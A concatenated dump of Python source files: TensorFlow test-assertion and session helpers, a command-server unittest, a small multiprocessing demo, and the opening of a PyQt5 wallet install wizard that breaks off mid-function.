numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
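# Editorial example (not part of the original module): assertAllClose accepts
# arbitrarily nested structures, so a test can compare dicts/lists of tensors
# and numpy arrays in one call. The values and tensors below are hypothetical.
#
#   expected = {"loss": 0.25, "grads": [np.array([1.0, 2.0]), np.array([3.0])]}
#   actual = {"loss": loss_tensor, "grads": grad_tensors}   # hypothetical
#   self.assertAllClose(expected, actual, rtol=1e-5, atol=1e-5)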
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
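# Editorial example (not part of the original module): the per-dtype tolerances
# let the same assertion be reused across precisions. The values below are
# illustrative only.
#
#   x = np.array([1.0, 2.0, 3.0], dtype=np.float16)
#   y = np.array([1.001, 2.001, 3.001], dtype=np.float16)
#   # Because the inputs are float16, the tolerance is relaxed to
#   # half_rtol/half_atol (1e-3 each), so this passes; with float64 inputs the
#   # default 1e-6 tolerances would apply and the same difference would fail.
#   self.assertAllCloseAccordingToType(x, y)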
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b, msg)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements")
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate lines. A line of ellipses (...) will be appended at the end if the
number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscript(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
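# Editorial example (not part of the original module): minimal sketches of the
# two element-wise domain checks above. The `model_probs` and `predicted_labels`
# tensors are hypothetical.
#
#   probs = self.evaluate(model_probs)          # hypothetical probability tensor
#   self.assertAllInRange(probs, 0.0, 1.0)
#
#   labels = self.evaluate(predicted_labels)    # hypothetical integer tensor
#   self.assertAllInSet(labels, {0, 1, 2})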
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
arrays = target if isinstance(target, list) else [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
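# Editorial example (not part of the original module): both predicate forms are
# sketched below -- a regular expression and a callable. The op under test and
# its inputs are hypothetical.
#
#   with self.assertRaisesOpError("negative input not supported"):
#     self.evaluate(my_op(bad_input))           # hypothetical op / input
#
#   with self.assertRaisesWithPredicateMatch(
#       ValueError, lambda e: "rank" in str(e)):
#     my_op(wrong_rank_input)                   # hypothetical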
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture
A figure (omitted here) illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally), and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
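# Editorial example (not part of the original module): a sketch of looking up a
# node in a GraphDef and inspecting it. The graph contents and the node name
# are hypothetical.
#
#   graph_def = some_graph.as_graph_def()        # hypothetical tf.Graph
#   node = get_node_def_from_graph("dense/MatMul", graph_def)
#   if node is not None:
#     print(node.op, node.attr["T"])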
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer == producer_version
|
test_command_server.py
|
import threading
import time
import unittest
from pisat.comm.transceiver import SocketTransceiver, CommSocket
from pisat.tester.comm import TestTransceiver
from can09.server.command_server import CommandServer
from can09.server.request import (
Request, RequestForm,
CommandBase, CommandParams, RequestCommandError, RequestParams
)
class TestCommand(CommandBase):
COMMAND = b"AA"
LEN_ARGS = CommandParams.ARGS_NOTHING
@classmethod
def exec(cls, sock: CommSocket, params: RequestParams) -> None:
pass
def test_decorator(name: str):
def _test_decorator(func):
def test(self):
print(f"\nStart {name}...")
func(self)
print(f"... Finish {name}")
return test
return _test_decorator
class TestCommandServer(unittest.TestCase):
def setUp(self) -> None:
self.addr_server = (0,)
self.addr_client = (1,)
self.transceiver_server = TestTransceiver(self.addr_server, name="server")
self.transceiver_client = TestTransceiver(self.addr_client, name="client")
self.socket_transceiver_server = SocketTransceiver(self.transceiver_server, name="st_server")
self.socket_transceiver_client = SocketTransceiver(self.transceiver_client, name="st_client")
self.request = Request
self.command_server = CommandServer(self.socket_transceiver_server, self.request)
self.command_server.append(TestCommand)
def make_request_form(self) -> RequestForm:
form = RequestForm()
form.reception_num = 1
form.command = TestCommand
form.args = (b"a", b"b", b"c")
return form
def make_request(self) -> bytes:
sock = self.socket_transceiver_client.create_socket(self.addr_server)
form = self.make_request_form()
return Request.make_request(sock, form)
@test_decorator("test_make_request")
def test_make_request(self):
request_ideal = b"$\x01AA1$1:1:1$abc"
request = self.make_request()
self.assertEqual(request, request_ideal)
@test_decorator("test_parse_request")
def test_parse_request(self):
self.exec_client()
sock = self.socket_transceiver_server.listen()
params = self.request.parse_request(sock)
print(f"RECEPTION NUMBER: {params.reception_num}")
print(f"COMMAND NAME: {params.command}")
print(f"ADDRESS: {params.address}")
print(f"ARGUMENTS: {params.args}")
def exec_client(self):
def _exec_client():
time.sleep(3)
request = self.make_request()
self.socket_transceiver_client.send_raw(self.addr_server, request)
th = threading.Thread(target=_exec_client)
th.start()
@test_decorator("test_serve")
def test_serve(self):
self.exec_client()
self.command_server.start_serve(timeout=5.)
@test_decorator("test_serve_no_command")
def test_serve_no_command(self):
server = CommandServer(self.socket_transceiver_server, Request)
try:
server.start_serve(timeout=5.)
raise Exception("RequestCommandError has not occurred.")
except RequestCommandError:
pass
if __name__ == "__main__":
unittest.main()
|
borrar.py
|
from multiprocessing import Process, Queue, Value
from time import sleep, time
class Hijo():
mensaje:str='Original'
#def __init__(self):
# self.qq = Queue()
def start(self, q:Queue):
self.qq = q
espera = 10
while True:
for _ in range(espera):
if not self.qq.empty():
msj = self.qq.get()
print(self.mensaje, msj)
sleep(1)
print('Esperando...')
#sleep(espera)
class Padre():
def __init__(self):
pass
def start(self):
h = Hijo()
h.mensaje = 'H de padre'
self.qq = Queue()
proc = Process(target=h.start, args=(self.qq,))
proc.start()
i : int = 0
while True:
print('Padre', i)
self.qq.put(i)
i += 1
sleep(5)
if __name__ == "__main__":
Padre().start()
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_civx.wallet import Wallet
from electrum_civx.storage import WalletStorage
from electrum_civx.util import UserCancelled, InvalidPassword
from electrum_civx.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_civx.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
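# Note: QPainter.drawPie takes its start and span angles in 1/16ths of a
# degree, hence the factor of 16 in the computations below.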
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
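# Editorial note: `wizard_dialog` wraps each dialog method below so that its
# return value is forwarded to the `run_next` callback found in kwargs; a
# GoBack exception navigates back (or closes the wizard at the first step) and
# UserCancelled silently aborts the step.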
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, plugins, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum CivX - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for the base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Needed for Qt on macOS. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum CivX wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg = _("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
